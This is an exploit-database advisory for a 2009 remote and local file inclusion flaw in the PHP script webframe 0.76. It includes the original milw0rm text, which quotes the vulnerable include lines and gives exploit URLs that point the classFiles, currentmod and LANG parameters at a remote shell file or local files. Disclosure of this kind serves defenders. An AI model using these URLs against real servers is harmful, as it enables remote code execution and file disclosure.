Rfi/Lfi Exploit in webframe 0.76

vendor:

webframe

by:

ahmadbady

7.5

CVSS

HIGH

Rfi/Lfi

CWE

Product Name: webframe

Affected Version From: 0.76

Affected Version To: 0.76

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2009

Rfi/Lfi Exploit in webframe 0.76

The webframe 0.76 script is vulnerable to Rfi/Lfi attacks. The vulnerabilities are present in the following files: /mod/admin/doc/index.php (line 3), /mod/index.php (lines 5, 7, 9, 11, 13), and /mod/base/menu.php (line 17). These vulnerabilities allow an attacker to include and execute arbitrary files from the server.

Mitigation:

The vendor has not provided a patch for this vulnerability. Users are advised to update to a newer version of the webframe script or implement proper input validation and sanitization to prevent Rfi/Lfi attacks.

Source

Exploit-DB raw data:

                          -----------------[-Rfi/Lfi-]-----------------

script:webframe 0.76
   
------------------------------------------------------------------
download from:http://downloads.sourceforge.net/phpwebframe/webframe-0.76-src.tar.gz?modtime=1155546760&big_mirror=0
   
------------------------------------------------------------------

........................................................
vul1: /mod/admin/doc/index.php line 3;

 include_once "$classFiles/xml.php";
==============================================
vul2:/mod/index.php line 5,7,9,11,13;

include_once "$classFiles/table.php";
//html class
include_once "$classFiles/html.php"; 
//Database class
include_once "$classFiles/mysql.php";
//Form class
include_once "$classFiles/form.php";
//Language file
include "../$currentmod/lang/$LANG.php"; ----> = lfi
============================================================
vul3: /mod/base/menu.php line 17;

  include_once "$classFiles/mysql.php
============================================================
-----------------------------------------------------

xpl rfi:

http://127.0..0.1/path/mod/admin/doc/index.php?classFiles=[shell.txt?]

http://127.0.0.1/path/mod/index.php?classFiles=[shell.txt?]

http://127.0.0..1/path/mod/base/menu.php?classFiles=[shell.txt?]

xpl lfi:

http://127.0.0.1/path/mod/index.php?currentmod=[Lfi]

http://127.0.0.1/path/mod/index.php?LANG=[Lfi]

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# milw0rm.com [2009-02-09]